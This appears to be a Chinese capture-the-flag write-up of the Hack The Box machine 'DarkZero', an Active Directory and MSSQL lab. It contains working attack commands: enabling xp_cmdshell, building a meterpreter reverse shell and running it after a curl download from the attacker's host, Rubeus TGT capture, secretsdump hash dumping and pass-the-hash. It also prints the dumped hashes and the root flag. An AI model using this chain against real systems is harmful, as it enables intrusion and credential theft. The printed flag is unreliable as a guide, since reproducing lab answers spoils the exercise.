HTB:DarkZero[WriteUP]

连接至HTB服务区并启动靶机

靶机IP:10.10.11.89(IP可能有变动)

分配IP:10.10.16.29(IP可能有变动)

  • 已有凭据

账户:john.w

密码:RFulUtONCOL!


信息收集

使用rustscan对靶机TCP端口进行开放扫描

bash 复制代码
rustscan -a 10.10.11.89 | grep -E '^[0-9]' | tee ports_scan_res.txt
  • 提取出开放端口
bash 复制代码
ports=$(cut -d'/' -f1 ports_res.txt | paste -sd,)

┌──(root㉿kali)-/home/kali/Desktop/temp

└─# ports=$(cut -d'/' -f1 ports_scan_res.txt | paste -sd,)

┌──(root㉿kali)-/home/kali/Desktop/temp

└─# echo $ports53,88,135,139,389,445,464,593,636,1433,2179,3268,3269,5985,9389,49664,49667,49676,49677,49897,49940,50010,62844

使用nmap对靶机TCP开放端口进行脚本、服务扫描

bash 复制代码
nmap -sT -p$ports -sCV -Pn 10.10.11.89
  • 需要重点关注的端口与服务

53端口:DNS服务

88端口:Kerveros服务

389端口:LDAP服务

445端口:SMB服务

1433端口:SQL Server服务

5985端口:WinRM服务

使用nmap对靶机UDP端口进行开放扫描

bash 复制代码
nmap -sU --top-ports 50 -Pn 10.10.11.89

使用nmap对靶机UDP开放端口进行脚本、版本扫描

bash 复制代码
nmap -sU -p53,123 -sCV -Pn 10.10.11.89

使用nxc验证凭据发现可以登录MSSQL

bash 复制代码
nxc mssql DC01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!'

┌──(root㉿kali)-/home/kali/Desktop/temp

└─# nxc mssql DC01.darkzero.htb -u 'john.w' -p 'RFulUtONCOL!'

MSSQL 10.10.11.89 1433 DC01 \* Windows 11 / Server 2025 Build 26100 (name:DC01) (domain:darkzero.htb)

MSSQL 10.10.11.89 1433 DC01 + darkzero.htb\john.w:RFulUtONCOL!


边界突破

使用impacket-mssqlclient连接靶机MSSQL

bash 复制代码
impacket-mssqlclient 'darkzero.htb'/'john.w':'RFulUtONCOL!'@'DC01.darkzero.htb' -windows-auth
  • 通过枚举出来的链接服务器,连接到远程SQL Server实例
bash 复制代码
use_link "DC02.darkzero.ext"
  • 查询远程SQL Server实例登录账户列表
bash 复制代码
enum_logins

由输出可见,当前登录账户为sysadmin权限

  • 尝试直接开启xp_cmdshell
bash 复制代码
enable_xp_cmdshell

SQL >"DC02.darkzero.ext" (dc01_sql_svc dbo@master)> enable_xp_cmdshell

INFO(DC02): Line 196: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.

INFO(DC02): Line 196: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.

  • 尝试通过xp_cmdshell执行命令
bash 复制代码
xp_cmdshell "whoami"

在攻击机生成MSF木马

bash 复制代码
msfvenom -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.34 LPORT=1425 -f exe -o msf.exe

┌──(root㉿kali)-/home/kali/Desktop/temp

└─# msfvenom -a x64 -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.16.34 LPORT=1425 -f exe -o msf.exe

- No platform was selected, choosing Msf::Module::Platform::Windows from the payload

No encoder specified, outputting raw payload

Payload size: 230982 bytes

Final size of exe file: 238080 bytes

Saved as: msf.exe

  • 在攻击机使用python开启http服务
bash 复制代码
python -m http.server 8888

控制靶机下载该木马

bash 复制代码
exec xp_cmdshell 'curl http://10.10.16.34:8888/msf.exe -o C:\Windows\Temp\msf.exe'
  • 在攻击机配置好监听模块
  • 控制靶机触发该木马
bash 复制代码
exec xp_cmdshell 'C:\Windows\Temp\msf.exe'
  • 成功获得MeterpreterShell

meterpreter > run post/windows/manage/migrate

\* Running module against DC02 (172.16.20.2)

\* Current server process: msf.exe (1068)

\* Spawning notepad.exe process to migrate into

\* Spoofing PPID 0

\* Migrating into 3380

+ Successfully migrated into process 3380

meterpreter > getuid

Server username: darkzero-ext\svc_sql

权限提升

运行自动提权扫描

bash 复制代码
run post/multi/recon/local_exploit_suggester
  • 切换到windows/local/cve_2024_30088_authz_basep模块进行权限提升利用
  • 切换到shell,在Administrator桌面上找到了user.txt文件

横向移动

上传一个Rubeus并启动TGT监听功能

bash 复制代码
.\Rubeus.exe monitor /interval:1 /nowrap

使用impacket-mssqlclient重新连接至DC01.darkzero.htb的SQL Server实例

bash 复制代码
impacket-mssqlclient 'darkzero.htb'/'john.w':'RFulUtONCOL!'@'DC01.darkzero.htb' -windows-auth
  • 使用xp_dirtree功能访问DC02.darkzero.ext
bash 复制代码
xp_dirtree \\DC02.darkzero.ext\x0da6h
  • 成功捕获TGT

账户:DC01$

票据:doIFjDCCBYigAwIBBaEDAgEWooIElDCCBJBhggSMMIIEiKADAgEFoQ4bDERBUktaRVJPLkhUQqIhMB+gAwIBAqEYMBYbBmtyYnRndBsMREFSS1pFUk8uSFRCo4IETDCCBEigAwIBEqEDAgECooIEOgSCBDbZRcHLj6QOxrDrJ/P6OSlBHEdDKhQ/tjBn9Xbp0P/WFIKA9277kVzQVt+sWzk6+DuRmFy6fl/M9fU9bT2nJdt7H9HNht6bqrxtkclI+wQA93zhGq+owgDiSq45WedJ1vPnrD448V+CNmrsCdPww/hWfrNliVFDBenknaL7uyYUys/q2wY/87nC6c4lebGmeD5RVaDzKSD/qZGcEDMpNmhARYFBFww/qswCN6/7PHBWDHVf8X4pYJJInbxcmNaWCo4r7LjqEyf0pvQEeO007FmuBMAbv9viX3LR1MygvyVXNlFE92wsMHk5by3Yy6JU/BsM4nNuNLVtBlPtBGOMxnuaRreFBCOa2VjNf89Un4z/WxS3sTJU/Yi4TRV2D69WSMiDy3pX1Bb0/XyqlfMEmqcCr2MePu8EKdrOCIL+OulydomgcBY7GI2edO7V3cuYXrkUztCIekSj1xL8LOOcobxP7/c8OxEJ2jh5SRrhxjO0c80RYSDcZhEEI5eQKPBIIhGTt83SC1vB9XptWYS6wvKeHUugLf8y8lTpSkqU6auUUIsqB3AutJpyv60l0ZXTu1+DiDzhuST/sYo5Jxk3cQ9LO6NH10BlZg9OrZjQj5PPYbkNXLfoexsTnBL9gGxtyBV1x6gwaIJLQ57LShyAZ5HNA6tdtRQxBzWr/ChkrZyGhp/f0hYPtrwsGpWCM5UTXut8ni4O74GdbRByvso3UwXEHbtMRj7ai3SojNbOgoNMTV4iswR8s8+Y/RU8Oi2ajzRJ5K44R9zpGeJ5NF9IBN7LTF9uYkg6i4QQ96EhhV58uq8Q7h1LrHULaxxlWODq+/B0IHF/ceZCFfSqFrBNgz2l00KJdPH2pik9lmHEqqzWFFE5o8Pnc3pjh6RU8GjK7CrY6CryNZu3eEEOgh27kyNDcDtPxhwmK4A1kIMPPVOdAvMTHxlfjUV9PtkySv5StZPsumrR8gv8HHCVNZQVxAxLAGs5upFsMKjo99SEc/UPsNIvUeGnANi6TP7p5IVbOXXIvQn83BcUdBNxPlPlHMc4QA1yZdjRsdRIAe4ojtlGfom9JVtDrDd8RTjLX/+N1ktbAIQnUzRrDs73EPugcOuSIv3KvBF3Wj3kJ1M7Khv7CZmBGEOm2WR9/HTlaNMf/IvjHMv4nEds6r9OylVBC0tR7/xtoO6dEqtwG+o9iwnkfdK0xoPWK29OGS3LtHqUsDJxWh/7JmVC2wTSTzOYMPucQF7ozOw9689CdMnq4YCvFavEZ0AG7nkk5lZGAe77XDmdkVThUTstJiveRwmigkxmrGaCNjEPw7HY4xCsYgxpZG8pSx8MsBBADoPxNpVgaAfH226MN1IAL+W802l+wabBAddp4RRJSz3fXCgf9IapoKAwAC/mZ/yS7Gi0UePGP/8JjiMSsahwq/fJjhlxTgFIWJxIIl6Ho4HjMIHgoAMCAQCigdgEgdV9gdIwgc+ggcwwgckwgcagKzApoAMCARKhIgQgVnOnkmHr0jTu/9OegyEuXEURmfLgtOhhtkpVFEU5xmGhDhsMREFSS1pFUk8uSFRCohIwEKADAgEBoQkwBxsFREMwMSSjBwMFAGChAAClERgPMjAyNjAxMTUxNDUzMThaphEYDzIwMjYwMTE2MDA1MzE4WqcRGA8yMDI2MDEyMjE0NTMxOFqoDhsMREFSS1pFUk8uSFRCqSEwH6ADAgECoRgwFhsGa3JidGd0GwxEQVJLWkVSTy5IVEI=

使用impacket-secretsdump转储DC01上的域账户密码哈希

bash 复制代码
export KRB5CCNAME=$(pwd)/ticket.ccache; ntpdate DC01.darkzero.htb; impacket-secretsdump -k -no-pass 'darkzero.htb'/'DC01$'@'DC01.darkzero.htb'

Administrator:500:aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726:::

Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::

krbtgt:502:aad3b435b51404eeaad3b435b51404ee:64f4771e4c60b8b176c3769300f6f3f7:::

john.w:2603:aad3b435b51404eeaad3b435b51404ee:44b1b5623a1446b5831a7b3a4be3977b:::

DC01$:1000:aad3b435b51404eeaad3b435b51404ee:d02e3fe0986e9b5f013dad12b2350b3a:::

darkzero-ext$:2602:aad3b435b51404eeaad3b435b51404ee:5af27325cb298aac6e9412c20bbf77e1:::

\* Kerberos keys grabbed

Administrator:0x14:2f8efea2896670fa78f4da08a53c1ced59018a89b762cbcf6628bd290039b9cd

Administrator:0x13:a23315d970fe9d556be03ab611730673

Administrator:aes256-cts-hmac-sha1-96:d4aa4a338e44acd57b857fc4d650407ca2f9ac3d6f79c9de59141575ab16cabd

Administrator:aes128-cts-hmac-sha1-96:b1e04b87abab7be2c600fc652ac84362

Administrator:0x17:5917507bdf2ef2c2b0a869a1cba40726

krbtgt:aes256-cts-hmac-sha1-96:6330aee12ac37e9c42bc9af3f1fec55d7755c31d70095ca1927458d216884d41

krbtgt:aes128-cts-hmac-sha1-96:0ffbe626519980a499cb85b30e0b80f3

krbtgt:0x17:64f4771e4c60b8b176c3769300f6f3f7

john.w:0x14:f6d74915f051ef9c1c085d31f02698c04a4c6804d509b7c4442e8593d6d957ea

john.w:0x13:7b145a89aed458eaea530a2bd1eb93bd

john.w:aes256-cts-hmac-sha1-96:49a6d3404e9d19859c0eea1036f6e95debbdea99efea4e2c11ee529add37717e

john.w:aes128-cts-hmac-sha1-96:87d9cbd84d85c50904eba39d588e47db

john.w:0x17:44b1b5623a1446b5831a7b3a4be3977b

DC01$:aes256-cts-hmac-sha1-96:25e1e7b4219c9b414726983f0f50bbf28daa11dd4a24eed82c451c4d763c9941

DC01$:aes128-cts-hmac-sha1-96:9996363bffe713a6777597c876d4f9db

DC01$:0x17:d02e3fe0986e9b5f013dad12b2350b3a

darkzero-ext$:aes256-cts-hmac-sha1-96:5f439bfb79745867f473ec9012c33fe1197dd0013a29ac7305af4b3f4a23997d

darkzero-ext$:aes128-cts-hmac-sha1-96:e87f4e4bff5718f5f5c03ea68cabdcaa

darkzero-ext$:0x17:5af27325cb298aac6e9412c20bbf77e1

使用impacket-psexec工具通过Administrator账户的密码哈希登录目标

bash 复制代码
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:5917507bdf2ef2c2b0a869a1cba40726 Administrator@DC01.darkzero.htb

C:\Users\Administrator\Desktop> dir

Volume in drive C has no label.

Volume Serial Number is EF7E-D912

Directory of C:\Users\Administrator\Desktop

07/31/2025 10:21 PM <DIR> .

03/24/2025 03:38 AM <DIR> ..

04/01/2026 02:15 AM 34 root.txt

04/01/2026 02:15 AM 34 user.txt

2 File(s) 68 bytes

2 Dir(s) 6,261,907,456 bytes free

C:\Users\Administrator\Desktop> type root.txt

fefc0237964c6c9bbd997bd4b4b43ff4

相关推荐
零零信安14 小时前
AI智能体,攻守失衡的催化剂 | 零零信安
人工智能·网络安全·数据泄露·暗网·零零信安
白帽小阳15 小时前
2026前端面试题!(附答案及解析)
javascript·网络·python·安全·web安全·网络安全·护网行动
白帽小阳17 小时前
[特殊字符]【2026最新】零基础入门学网络安全(详细路线图),看这篇就够了!
学习·安全·web安全·网络安全·安全运营·学习路线·web渗透
HackTwoHub1 天前
AI大模型攻击思路,涵盖提示词劫持、知识库投毒、多语种混淆 + 身份伪装、诱导 AI 输出涉密后台核心配置
人工智能·安全·web安全·网络安全·自动化·系统安全·安全架构
Eastmount1 天前
[论文阅读] (51)ESWA25 基于启发式优化器的入侵检测系统
论文阅读·网络安全·sci·入侵检测·eswa
白帽小阳1 天前
Typora插件开发指南:打造专属IDE式写作环境
c语言·网络·python·网络安全·github·pygame·护网行动
Sagittarius_A*1 天前
Web 渗透信息收集实战:站点指纹识别与目录扫描
网络安全·渗透测试·kali
m0_738120722 天前
PHP代码审计基础——超全局变量(三)
开发语言·安全·网络安全·php
其实防守也摸鱼2 天前
运维--怎么看接口的请求和返回
运维·学习·网络安全·网络攻击模型·burpsuite·攻防对抗·蓝队
菩提小狗3 天前
每日安全情报报告 · 2026-07-09
网络安全·漏洞·cve·安全情报·每日安全